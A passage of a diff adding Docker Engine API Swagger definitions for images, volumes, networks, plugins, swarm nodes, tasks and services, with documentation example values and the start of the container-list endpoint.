$ref: "#/definitions/GraphDriver" + RootFS: + type: "object" + properties: + Type: + type: "string" + Layers: + type: "array" + items: + type: "string" + BaseLayer: + type: "string" + + ImageSummary: + type: "object" + required: + - Id + - ParentId + - RepoTags + - RepoDigests + - Created + - Size + - SharedSize + - VirtualSize + - Labels + - Containers + properties: + Id: + type: "string" + x-nullable: false + ParentId: + type: 
"string" + x-nullable: false + RepoTags: + type: "array" + x-nullable: false + items: + type: "string" + RepoDigests: + type: "array" + x-nullable: false + items: + type: "string" + Created: + type: "integer" + x-nullable: false + Size: + type: "integer" + x-nullable: false + SharedSize: + type: "integer" + x-nullable: false + VirtualSize: + type: "integer" + x-nullable: false + Labels: + type: "object" + x-nullable: false + additionalProperties: + type: "string" + Containers: + x-nullable: false + type: "integer" + + AuthConfig: + type: "object" + properties: + username: + type: "string" + password: + type: "string" + email: + type: "string" + serveraddress: + type: "string" + example: + username: "hannibal" + password: "xxxx" + serveraddress: "https://index.docker.io/v1/" + + ProcessConfig: + type: "object" + properties: + privileged: + type: "boolean" + user: + type: "string" + tty: + type: "boolean" + entrypoint: + type: "string" + arguments: + type: "array" + items: + type: "string" + + Volume: + type: "object" + required: [Name, Driver, Mountpoint, Labels, Scope, Options] + properties: + Name: + type: "string" + description: "Name of the volume." + x-nullable: false + Driver: + type: "string" + description: "Name of the volume driver used by the volume." + x-nullable: false + Mountpoint: + type: "string" + description: "Mount path of the volume on the host." + x-nullable: false + Status: + type: "object" + description: | + Low-level details about the volume, provided by the volume driver. + Details are returned as a map with key/value pairs: + `{"key":"value","key2":"value2"}`. + + The `Status` field is optional, and is omitted if the volume driver + does not support this feature. + additionalProperties: + type: "object" + Labels: + type: "object" + description: "User-defined key/value metadata." + x-nullable: false + additionalProperties: + type: "string" + Scope: + type: "string" + description: "The level at which the volume exists. 
Either `global` for cluster-wide, or `local` for machine level." + default: "local" + x-nullable: false + enum: ["local", "global"] + Options: + type: "object" + description: "The driver specific options used when creating the volume." + additionalProperties: + type: "string" + UsageData: + type: "object" + required: [Size, RefCount] + properties: + Size: + type: "integer" + description: "The disk space used by the volume (local driver only)" + default: -1 + x-nullable: false + RefCount: + type: "integer" + default: -1 + description: "The number of containers referencing this volume." + x-nullable: false + + example: + Name: "tardis" + Driver: "custom" + Mountpoint: "/var/lib/docker/volumes/tardis" + Status: + hello: "world" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + Scope: "local" + + Network: + type: "object" + properties: + Name: + type: "string" + Id: + type: "string" + Created: + type: "string" + format: "dateTime" + Scope: + type: "string" + Driver: + type: "string" + EnableIPv6: + type: "boolean" + IPAM: + $ref: "#/definitions/IPAM" + Internal: + type: "boolean" + Containers: + type: "object" + additionalProperties: + $ref: "#/definitions/NetworkContainer" + Options: + type: "object" + additionalProperties: + type: "string" + Labels: + type: "object" + additionalProperties: + type: "string" + example: + Name: "net01" + Id: "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99" + Created: "2016-10-19T04:33:30.360899459Z" + Scope: "local" + Driver: "bridge" + EnableIPv6: false + IPAM: + Driver: "default" + Config: + - Subnet: "172.19.0.0/16" + Gateway: "172.19.0.1" + Options: + foo: "bar" + Internal: false + Containers: + 19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c: + Name: "test" + EndpointID: "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a" + MacAddress: "02:42:ac:13:00:02" + IPv4Address: "172.19.0.2/16" + IPv6Address: "" + Options: + 
com.docker.network.bridge.default_bridge: "true" + com.docker.network.bridge.enable_icc: "true" + com.docker.network.bridge.enable_ip_masquerade: "true" + com.docker.network.bridge.host_binding_ipv4: "0.0.0.0" + com.docker.network.bridge.name: "docker0" + com.docker.network.driver.mtu: "1500" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + IPAM: + type: "object" + properties: + Driver: + description: "Name of the IPAM driver to use." + type: "string" + default: "default" + Config: + description: "List of IPAM configuration options, specified as a map: `{\"Subnet\": , \"IPRange\": , \"Gateway\": , \"AuxAddress\": }`" + type: "array" + items: + type: "object" + additionalProperties: + type: "string" + Options: + description: "Driver-specific options, specified as a map." + type: "array" + items: + type: "object" + additionalProperties: + type: "string" + NetworkContainer: + type: "object" + properties: + EndpointID: + type: "string" + MacAddress: + type: "string" + IPv4Address: + type: "string" + IPv6Address: + type: "string" + + BuildInfo: + type: "object" + properties: + id: + type: "string" + stream: + type: "string" + error: + type: "string" + errorDetail: + $ref: "#/definitions/ErrorDetail" + status: + type: "string" + progress: + type: "string" + progressDetail: + $ref: "#/definitions/ProgressDetail" + + CreateImageInfo: + type: "object" + properties: + error: + type: "string" + status: + type: "string" + progress: + type: "string" + progressDetail: + $ref: "#/definitions/ProgressDetail" + + PushImageInfo: + type: "object" + properties: + error: + type: "string" + status: + type: "string" + progress: + type: "string" + progressDetail: + $ref: "#/definitions/ProgressDetail" + ErrorDetail: + type: "object" + properties: + code: + type: "integer" + message: + type: "string" + ProgressDetail: + type: "object" + properties: + code: + type: "integer" + message: + type: "integer" + + ErrorResponse: + description: 
"Represents an error." + type: "object" + required: ["message"] + properties: + message: + description: "The error message." + type: "string" + x-nullable: false + example: + message: "Something went wrong." + + IdResponse: + description: "Response to an API call that returns just an Id" + type: "object" + required: ["Id"] + properties: + Id: + description: "The id of the newly created object." + type: "string" + x-nullable: false + + EndpointSettings: + description: "Configuration for a network endpoint." + type: "object" + properties: + IPAMConfig: + description: "IPAM configurations for the endpoint" + type: "object" + properties: + IPv4Address: + type: "string" + IPv6Address: + type: "string" + LinkLocalIPs: + type: "array" + items: + type: "string" + Links: + type: "array" + items: + type: "string" + Aliases: + type: "array" + items: + type: "string" + NetworkID: + type: "string" + EndpointID: + type: "string" + Gateway: + type: "string" + IPAddress: + type: "string" + IPPrefixLen: + type: "integer" + IPv6Gateway: + type: "string" + GlobalIPv6Address: + type: "string" + GlobalIPv6PrefixLen: + type: "integer" + format: "int64" + MacAddress: + type: "string" + + PluginMount: + type: "object" + x-nullable: false + required: [Name, Description, Settable, Source, Destination, Type, Options] + properties: + Name: + type: "string" + x-nullable: false + Description: + type: "string" + x-nullable: false + Settable: + type: "array" + items: + type: "string" + Source: + type: "string" + Destination: + type: "string" + x-nullable: false + Type: + type: "string" + x-nullable: false + Options: + type: "array" + items: + type: "string" + + PluginDevice: + type: "object" + required: [Name, Description, Settable, Path] + x-nullable: false + properties: + Name: + type: "string" + x-nullable: false + Description: + type: "string" + x-nullable: false + Settable: + type: "array" + items: + type: "string" + Path: + type: "string" + + PluginEnv: + type: "object" + x-nullable: false 
+ required: [Name, Description, Settable, Value] + properties: + Name: + x-nullable: false + type: "string" + Description: + x-nullable: false + type: "string" + Settable: + type: "array" + items: + type: "string" + Value: + type: "string" + + PluginInterfaceType: + type: "object" + x-nullable: false + required: [Prefix, Capability, Version] + properties: + Prefix: + type: "string" + x-nullable: false + Capability: + type: "string" + x-nullable: false + Version: + type: "string" + x-nullable: false + + Plugin: + description: "A plugin for the Engine API" + type: "object" + required: [Settings, Enabled, Config, Name] + properties: + Id: + type: "string" + Name: + type: "string" + x-nullable: false + Enabled: + description: "True when the plugin is running. False when the plugin is not running, only installed." + type: "boolean" + x-nullable: false + Settings: + description: "Settings that can be modified by users." + type: "object" + x-nullable: false + required: [Args, Devices, Env, Mounts] + properties: + Mounts: + type: "array" + items: + $ref: "#/definitions/PluginMount" + Env: + type: "array" + items: + type: "string" + Args: + type: "array" + items: + type: "string" + Devices: + type: "array" + items: + $ref: "#/definitions/PluginDevice" + PluginReference: + description: "plugin remote reference used to push/pull the plugin" + type: "string" + x-nullable: false + Config: + description: "The config of a plugin." 
+ type: "object" + x-nullable: false + required: + - Description + - Documentation + - Interface + - Entrypoint + - WorkDir + - Network + - Linux + - PropagatedMount + - Mounts + - Env + - Args + properties: + Description: + type: "string" + x-nullable: false + Documentation: + type: "string" + x-nullable: false + Interface: + description: "The interface between Docker and the plugin" + x-nullable: false + type: "object" + required: [Types, Socket] + properties: + Types: + type: "array" + items: + $ref: "#/definitions/PluginInterfaceType" + Socket: + type: "string" + x-nullable: false + Entrypoint: + type: "array" + items: + type: "string" + WorkDir: + type: "string" + x-nullable: false + User: + type: "object" + x-nullable: false + properties: + UID: + type: "integer" + format: "uint32" + GID: + type: "integer" + format: "uint32" + Network: + type: "object" + x-nullable: false + required: [Type] + properties: + Type: + x-nullable: false + type: "string" + Linux: + type: "object" + x-nullable: false + required: [Capabilities, AllowAllDevices, Devices] + properties: + Capabilities: + type: "array" + items: + type: "string" + AllowAllDevices: + type: "boolean" + x-nullable: false + Devices: + type: "array" + items: + $ref: "#/definitions/PluginDevice" + PropagatedMount: + type: "string" + x-nullable: false + Mounts: + type: "array" + items: + $ref: "#/definitions/PluginMount" + Env: + type: "array" + items: + $ref: "#/definitions/PluginEnv" + Args: + type: "object" + x-nullable: false + required: [Name, Description, Settable, Value] + properties: + Name: + x-nullable: false + type: "string" + Description: + x-nullable: false + type: "string" + Settable: + type: "array" + items: + type: "string" + Value: + type: "array" + items: + type: "string" + rootfs: + type: "object" + properties: + type: + type: "string" + diff_ids: + type: "array" + items: + type: "string" + example: + Id: "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078" + Name: 
"tiborvass/sample-volume-plugin" + Tag: "latest" + Active: true + Settings: + Env: + - "DEBUG=0" + Args: null + Devices: null + Config: + Description: "A sample volume plugin for Docker" + Documentation: "https://docs.docker.com/engine/extend/plugins/" + Interface: + Types: + - "docker.volumedriver/1.0" + Socket: "plugins.sock" + Entrypoint: + - "/usr/bin/sample-volume-plugin" + - "/data" + WorkDir: "" + User: {} + Network: + Type: "" + Linux: + Capabilities: null + AllowAllDevices: false + Devices: null + Mounts: null + PropagatedMount: "/data" + Env: + - Name: "DEBUG" + Description: "If set, prints debug messages" + Settable: null + Value: "0" + Args: + Name: "args" + Description: "command line arguments" + Settable: null + Value: [] + + NodeSpec: + type: "object" + properties: + Name: + description: "Name for the node." + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + Role: + description: "Role of the node." + type: "string" + enum: + - "worker" + - "manager" + Availability: + description: "Availability of the node." 
+ type: "string" + enum: + - "active" + - "pause" + - "drain" + example: + Availability: "active" + Name: "node-name" + Role: "manager" + Labels: + foo: "bar" + Node: + type: "object" + properties: + ID: + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Spec: + $ref: "#/definitions/NodeSpec" + Description: + type: "object" + properties: + Hostname: + type: "string" + Platform: + type: "object" + properties: + Architecture: + type: "string" + OS: + type: "string" + Resources: + type: "object" + properties: + NanoCPUs: + type: "integer" + format: "int64" + MemoryBytes: + type: "integer" + format: "int64" + Engine: + type: "object" + properties: + EngineVersion: + type: "string" + Labels: + type: "object" + additionalProperties: + type: "string" + Plugins: + type: "array" + items: + type: "object" + properties: + Type: + type: "string" + Name: + type: "string" + example: + ID: "24ifsmvkjbyhk" + Version: + Index: 8 + CreatedAt: "2016-06-07T20:31:11.853781916Z" + UpdatedAt: "2016-06-07T20:31:11.999868824Z" + Spec: + Name: "my-node" + Role: "manager" + Availability: "active" + Labels: + foo: "bar" + Description: + Hostname: "bf3067039e47" + Platform: + Architecture: "x86_64" + OS: "linux" + Resources: + NanoCPUs: 4000000000 + MemoryBytes: 8272408576 + Engine: + EngineVersion: "1.13.0" + Labels: + foo: "bar" + Plugins: + - Type: "Volume" + Name: "local" + - Type: "Network" + Name: "bridge" + - Type: "Network" + Name: "null" + - Type: "Network" + Name: "overlay" + Status: + State: "ready" + Addr: "172.17.0.2" + ManagerStatus: + Leader: true + Reachability: "reachable" + Addr: "172.17.0.2:2377" + SwarmSpec: + description: "User modifiable swarm configuration." + type: "object" + properties: + Name: + description: "Name of the swarm." + type: "string" + Labels: + description: "User-defined key/value metadata." 
+ type: "object" + additionalProperties: + type: "string" + Orchestration: + description: "Orchestration configuration." + type: "object" + properties: + TaskHistoryRetentionLimit: + description: "The number of historic tasks to keep per instance or node. If negative, never remove completed or failed tasks." + type: "integer" + format: "int64" + Raft: + description: "Raft configuration." + type: "object" + properties: + SnapshotInterval: + description: "The number of log entries between snapshots." + type: "integer" + format: "int64" + KeepOldSnapshots: + description: "The number of snapshots to keep beyond the current snapshot." + type: "integer" + format: "int64" + LogEntriesForSlowFollowers: + description: "The number of log entries to keep around to sync up slow followers after a snapshot is created." + type: "integer" + format: "int64" + ElectionTick: + description: | + The number of ticks that a follower will wait for a message from the leader before becoming a candidate and starting an election. `ElectionTick` must be greater than `HeartbeatTick`. + + A tick currently defaults to one second, so these translate directly to seconds currently, but this is NOT guaranteed. + type: "integer" + HeartbeatTick: + description: | + The number of ticks between heartbeats. Every HeartbeatTick ticks, the leader will send a heartbeat to the followers. + + A tick currently defaults to one second, so these translate directly to seconds currently, but this is NOT guaranteed. + type: "integer" + Dispatcher: + description: "Dispatcher configuration." + type: "object" + properties: + HeartbeatPeriod: + description: "The delay for an agent to send a heartbeat to the dispatcher." + type: "integer" + format: "int64" + CAConfig: + description: "CA configuration." + type: "object" + properties: + NodeCertExpiry: + description: "The duration node certificates are issued for." 
+ type: "integer" + format: "int64" + ExternalCAs: + description: "Configuration for forwarding signing requests to an external certificate authority." + type: "array" + items: + type: "object" + properties: + Protocol: + description: "Protocol for communication with the external CA (currently only `cfssl` is supported)." + type: "string" + enum: + - "cfssl" + default: "cfssl" + URL: + description: "URL where certificate signing requests should be sent." + type: "string" + Options: + description: "An object with key/value pairs that are interpreted as protocol-specific options for the external CA driver." + type: "object" + additionalProperties: + type: "string" + EncryptionConfig: + description: "Parameters related to encryption-at-rest." + type: "object" + properties: + AutoLockManagers: + description: "If set, generate a key and use it to lock data stored on the managers." + type: "boolean" + TaskDefaults: + description: "Defaults for creating tasks in this cluster." + type: "object" + properties: + LogDriver: + description: | + The log driver to use for tasks created in the orchestrator if unspecified by a service. + + Updating this value will only have an affect on new tasks. Old tasks will continue use their previously configured log driver until recreated. + type: "object" + properties: + Name: + type: "string" + Options: + type: "object" + additionalProperties: + type: "string" + example: + Name: "default" + Orchestration: + TaskHistoryRetentionLimit: 10 + Raft: + SnapshotInterval: 10000 + LogEntriesForSlowFollowers: 500 + HeartbeatTick: 1 + ElectionTick: 3 + Dispatcher: + HeartbeatPeriod: 5000000000 + CAConfig: + NodeCertExpiry: 7776000000000000 + JoinTokens: + Worker: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx" + Manager: "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2" + EncryptionConfig: + AutoLockManagers: false + # The Swarm information for `GET /info`. 
It is the same as `GET /swarm`, but + # without `JoinTokens`. + ClusterInfo: + type: "object" + properties: + ID: + description: "The ID of the swarm." + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Spec: + $ref: "#/definitions/SwarmSpec" + TaskSpec: + description: "User modifiable task configuration." + type: "object" + properties: + ContainerSpec: + type: "object" + properties: + Image: + description: "The image name to use for the container." + type: "string" + Command: + description: "The command to be run in the image." + type: "array" + items: + type: "string" + Args: + description: "Arguments to the command." + type: "array" + items: + type: "string" + Env: + description: "A list of environment variables in the form `VAR=value`." + type: "array" + items: + type: "string" + Dir: + description: "The working directory for commands to run in." + type: "string" + User: + description: "The user inside the container." + type: "string" + Labels: + description: "User-defined key/value data." + type: "object" + additionalProperties: + type: "string" + TTY: + description: "Whether a pseudo-TTY should be allocated." + type: "boolean" + Mounts: + description: "Specification for mounts to be added to containers created as part of the service." + type: "array" + items: + $ref: "#/definitions/Mount" + StopGracePeriod: + description: "Amount of time to wait for the container to terminate before forcefully killing it." + type: "integer" + format: "int64" + DNSConfig: + description: "Specification for DNS related configurations in resolver configuration file (`resolv.conf`)." + type: "object" + properties: + Nameservers: + description: "The IP addresses of the name servers." + type: "array" + items: + type: "string" + Search: + description: "A search list for host-name lookup." 
+ type: "array" + items: + type: "string" + Options: + description: "A list of internal resolver variables to be modified (e.g., `debug`, `ndots:3`, etc.)." + type: "array" + items: + type: "string" + Resources: + description: "Resource requirements which apply to each individual container created as part of the service." + type: "object" + properties: + Limits: + description: "Define resources limits." + type: "object" + properties: + NanoCPUs: + description: "CPU limit in units of 10-9 CPU shares." + type: "integer" + format: "int64" + MemoryBytes: + description: "Memory limit in Bytes." + type: "integer" + format: "int64" + Reservation: + description: "Define resources reservation." + properties: + NanoCPUs: + description: "CPU reservation in units of 10-9 CPU shares." + type: "integer" + format: "int64" + MemoryBytes: + description: "Memory reservation in Bytes." + type: "integer" + format: "int64" + RestartPolicy: + description: "Specification for the restart policy which applies to containers created as part of this service." + type: "object" + properties: + Condition: + description: "Condition for restart." + type: "string" + enum: + - "none" + - "on-failure" + - "any" + Delay: + description: "Delay between restart attempts." + type: "integer" + format: "int64" + MaxAttempts: + description: "Maximum attempts to restart a given container before giving up (default value is 0, which is ignored)." + type: "integer" + format: "int64" + default: 0 + Window: + description: "Windows is the time window used to evaluate the restart policy (default value is 0, which is unbounded)." + type: "integer" + format: "int64" + default: 0 + Placement: + type: "object" + properties: + Constraints: + description: "An array of constraints." + type: "array" + items: + type: "string" + ForceUpdate: + description: "A counter that triggers an update even if no relevant parameters have been changed." 
+ type: "integer" + Networks: + type: "array" + items: + type: "object" + properties: + Target: + type: "string" + Aliases: + type: "array" + items: + type: "string" + LogDriver: + description: "Specifies the log driver to use for tasks created from this spec. If not present, the default one for the swarm will be used, finally falling back to the engine default if not specified." + type: "object" + properties: + Name: + type: "string" + Options: + type: "object" + additionalProperties: + type: "string" + TaskState: + type: "string" + enum: + - "new" + - "allocated" + - "pending" + - "assigned" + - "accepted" + - "preparing" + - "ready" + - "starting" + - "running" + - "complete" + - "shutdown" + - "failed" + - "rejected" + Task: + type: "object" + properties: + ID: + description: "The ID of the task." + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Name: + description: "Name of the task." + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + Spec: + $ref: "#/definitions/TaskSpec" + ServiceID: + description: "The ID of the service this task is part of." + type: "string" + Slot: + type: "integer" + NodeID: + description: "The ID of the node that this task is on." 
+ type: "string" + Status: + type: "object" + properties: + Timestamp: + type: "string" + format: "dateTime" + State: + $ref: "#/definitions/TaskState" + Message: + type: "string" + Err: + type: "string" + ContainerStatus: + type: "object" + properties: + ContainerID: + type: "string" + PID: + type: "integer" + ExitCode: + type: "integer" + DesiredState: + $ref: "#/definitions/TaskState" + example: + ID: "0kzzo1i0y4jz6027t0k7aezc7" + Version: + Index: 71 + CreatedAt: "2016-06-07T21:07:31.171892745Z" + UpdatedAt: "2016-06-07T21:07:31.376370513Z" + Spec: + ContainerSpec: + Image: "redis" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ServiceID: "9mnpnzenvg8p8tdbtq4wvbkcz" + Slot: 1 + NodeID: "60gvrl6tm78dmak4yl7srz94v" + Status: + Timestamp: "2016-06-07T21:07:31.290032978Z" + State: "running" + Message: "started" + ContainerStatus: + ContainerID: "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035" + PID: 677 + DesiredState: "running" + NetworksAttachments: + - Network: + ID: "4qvuz4ko70xaltuqbt8956gd1" + Version: + Index: 18 + CreatedAt: "2016-06-07T20:31:11.912919752Z" + UpdatedAt: "2016-06-07T21:07:29.955277358Z" + Spec: + Name: "ingress" + Labels: + com.docker.swarm.internal: "true" + DriverConfiguration: {} + IPAMOptions: + Driver: {} + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + DriverState: + Name: "overlay" + Options: + com.docker.network.driver.overlay.vxlanid_list: "256" + IPAMOptions: + Driver: + Name: "default" + Configs: + - Subnet: "10.255.0.0/16" + Gateway: "10.255.0.1" + Addresses: + - "10.255.0.10/16" + ServiceSpec: + description: "User modifiable configuration for a service." + properties: + Name: + description: "Name of the service." + type: "string" + Labels: + description: "User-defined key/value metadata." 
+ type: "object" + additionalProperties: + type: "string" + TaskTemplate: + $ref: "#/definitions/TaskSpec" + Mode: + description: "Scheduling mode for the service." + type: "object" + properties: + Replicated: + type: "object" + properties: + Replicas: + type: "integer" + format: "int64" + Global: + type: "object" + UpdateConfig: + description: "Specification for the update strategy of the service." + type: "object" + properties: + Parallelism: + description: "Maximum number of tasks to be updated in one iteration (0 means unlimited parallelism)." + type: "integer" + format: "int64" + Delay: + description: "Amount of time between updates, in nanoseconds." + type: "integer" + format: "int64" + FailureAction: + description: "Action to take if an updated task fails to run, or stops running during the update." + type: "string" + enum: + - "continue" + - "pause" + Monitor: + description: "Amount of time to monitor each updated task for failures, in nanoseconds." + type: "integer" + format: "int64" + MaxFailureRatio: + description: "The fraction of tasks that may fail during an update before the failure action is invoked, specified as a floating point number between 0 and 1." + type: "number" + default: 0 + Networks: + description: "Array of network names or IDs to attach the service to." + type: "array" + items: + type: "object" + properties: + Target: + type: "string" + Aliases: + type: "array" + items: + type: "string" + EndpointSpec: + $ref: "#/definitions/EndpointSpec" + EndpointPortConfig: + type: "object" + properties: + Name: + type: "string" + Protocol: + type: "string" + enum: + - "tcp" + - "udp" + TargetPort: + description: "The port inside the container." + type: "integer" + PublishedPort: + description: "The port on the swarm hosts." + type: "integer" + EndpointSpec: + description: "Properties that can be configured to access and load balance a service." 
+ type: "object" + properties: + Mode: + description: "The mode of resolution to use for internal load balancing + between tasks." + type: "string" + enum: + - "vip" + - "dnsrr" + default: "vip" + Ports: + description: "List of exposed ports that this service is accessible on from the outside. Ports can only be provided if `vip` resolution mode is used." + type: "array" + items: + $ref: "#/definitions/EndpointPortConfig" + Service: + type: "object" + properties: + ID: + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Spec: + $ref: "#/definitions/ServiceSpec" + Endpoint: + type: "object" + properties: + Spec: + $ref: "#/definitions/EndpointSpec" + Ports: + type: "array" + items: + $ref: "#/definitions/EndpointPortConfig" + VirtualIPs: + type: "array" + items: + type: "object" + properties: + NetworkID: + type: "string" + Addr: + type: "string" + UpdateStatus: + description: "The status of a service update." 
+ type: "object" + properties: + State: + type: "string" + enum: + - "updating" + - "paused" + - "completed" + StartedAt: + type: "string" + format: "dateTime" + CompletedAt: + type: "string" + format: "dateTime" + Message: + type: "string" + example: + ID: "9mnpnzenvg8p8tdbtq4wvbkcz" + Version: + Index: 19 + CreatedAt: "2016-06-07T21:05:51.880065305Z" + UpdatedAt: "2016-06-07T21:07:29.962229872Z" + Spec: + Name: "hopeful_cori" + TaskTemplate: + ContainerSpec: + Image: "redis" + Resources: + Limits: {} + Reservations: {} + RestartPolicy: + Condition: "any" + MaxAttempts: 0 + Placement: {} + ForceUpdate: 0 + Mode: + Replicated: + Replicas: 1 + UpdateConfig: + Parallelism: 1 + FailureAction: "pause" + Monitor: 15000000000 + MaxFailureRatio: 0.15 + EndpointSpec: + Mode: "vip" + Ports: + - + Protocol: "tcp" + TargetPort: 6379 + PublishedPort: 30001 + Endpoint: + Spec: + Mode: "vip" + Ports: + - + Protocol: "tcp" + TargetPort: 6379 + PublishedPort: 30001 + Ports: + - + Protocol: "tcp" + TargetPort: 6379 + PublishedPort: 30001 + VirtualIPs: + - + NetworkID: "4qvuz4ko70xaltuqbt8956gd1" + Addr: "10.255.0.2/16" + - + NetworkID: "4qvuz4ko70xaltuqbt8956gd1" + Addr: "10.255.0.3/16" + ImageDeleteResponse: + type: "object" + properties: + Untagged: + description: "The image ID of an image that was untagged" + type: "string" + Deleted: + description: "The image ID of an image that was deleted" + type: "string" + ServiceUpdateResponse: + type: "object" + properties: + Warnings: + description: "Optional warning messages" + type: "array" + items: + type: "string" + example: + Warning: "unable to pin image doesnotexist:latest to digest: image library/doesnotexist:latest not found" + ContainerSummary: + type: "array" + items: + type: "object" + properties: + Id: + description: "The ID of this container" + type: "string" + x-go-name: "ID" + Names: + description: "The names that this container has been given" + type: "array" + items: + type: "string" + Image: + description: "The name of 
the image used when creating this container" + type: "string" + ImageID: + description: "The ID of the image that this container was created from" + type: "string" + Command: + description: "Command to run when starting the container" + type: "string" + Created: + description: "When the container was created" + type: "integer" + format: "int64" + Ports: + description: "The ports exposed by this container" + type: "array" + items: + $ref: "#/definitions/Port" + SizeRw: + description: "The size of files that have been created or changed by this container" + type: "integer" + format: "int64" + SizeRootFs: + description: "The total size of all the files in this container" + type: "integer" + format: "int64" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + State: + description: "The state of this container (e.g. `Exited`)" + type: "string" + Status: + description: "Additional human-readable status of this container (e.g. `Exit 0`)" + type: "string" + HostConfig: + type: "object" + properties: + NetworkMode: + type: "string" + NetworkSettings: + description: "A summary of the container's network settings" + type: "object" + properties: + Networks: + type: "object" + additionalProperties: + $ref: "#/definitions/EndpointSettings" + Mounts: + type: "array" + items: + $ref: "#/definitions/Mount" + SecretSpec: + type: "object" + properties: + Name: + description: "User-defined name of the secret." + type: "string" + Labels: + description: "User-defined key/value metadata." 
+ type: "object" + additionalProperties: + type: "string" + Data: + description: "Base64-url-safe-encoded secret data" + type: "array" + items: + type: "string" + Secret: + type: "object" + properties: + ID: + type: "string" + Version: + type: "object" + properties: + Index: + type: "integer" + format: "int64" + CreatedAt: + type: "string" + format: "dateTime" + UpdatedAt: + type: "string" + format: "dateTime" + Spec: + $ref: "#/definitions/ServiceSpec" +paths: + /containers/json: + get: + summary: "List containers" + operationId: "ContainerList" + produces: + - "application/json" + parameters: + - name: "all" + in: "query" + description: "Return all containers. By default, only running containers are shown" + type: "boolean" + default: false + - name: "limit" + in: "query" + description: "Return this number of most recently created containers, including non-running ones." + type: "integer" + - name: "size" + in: "query" + description: "Return the size of container as fields `SizeRw` and `SizeRootFs`." + type: "boolean" + default: false + - name: "filters" + in: "query" + description: | + Filters to process on the container list, encoded as JSON (a `map[string][]string`). For example, `{"status": ["paused"]}` will only return paused containers. 
+ + Available filters: + - `exited=` containers with exit code of `` + - `status=`(`created`|`restarting`|`running`|`removing`|`paused`|`exited`|`dead`) + - `label=key` or `label="key=value"` of a container label + - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only) + - `id=` a container's ID + - `name=` a container's name + - `is-task=`(`true`|`false`) + - `ancestor`=(`[:]`, ``, or ``) + - `before`=(`` or ``) + - `since`=(`` or ``) + - `volume`=(`` or ``) + - `network`=(`` or ``) + - `health`=(`starting`|`healthy`|`unhealthy`|`none`) + type: "string" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/ContainerSummary" + examples: + application/json: + - Id: "8dfafdbc3a40" + Names: + - "/boring_feynman" + Image: "ubuntu:latest" + ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82" + Command: "echo 1" + Created: 1367854155 + State: "Exited" + Status: "Exit 0" + Ports: + - PrivatePort: 2222 + PublicPort: 3333 + Type: "tcp" + Labels: + com.example.vendor: "Acme" + com.example.license: "GPL" + com.example.version: "1.0" + SizeRw: 12288 + SizeRootFs: 0 + HostConfig: + NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + NetworkID: "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812" + EndpointID: "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f" + Gateway: "172.17.0.1" + IPAddress: "172.17.0.2" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:11:00:02" + Mounts: + - Name: "fac362...80535" + Source: "/data" + Destination: "/data" + Driver: "local" + Mode: "ro,Z" + RW: false + Propagation: "" + - Id: "9cd87474be90" + Names: + - "/coolName" + Image: "ubuntu:latest" + ImageID: "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82" + Command: "echo 222222" + Created: 1367854155 + State: "Exited" + Status: "Exit 0" + Ports: [] + Labels: {} + SizeRw: 12288 + SizeRootFs: 0 + HostConfig: + 
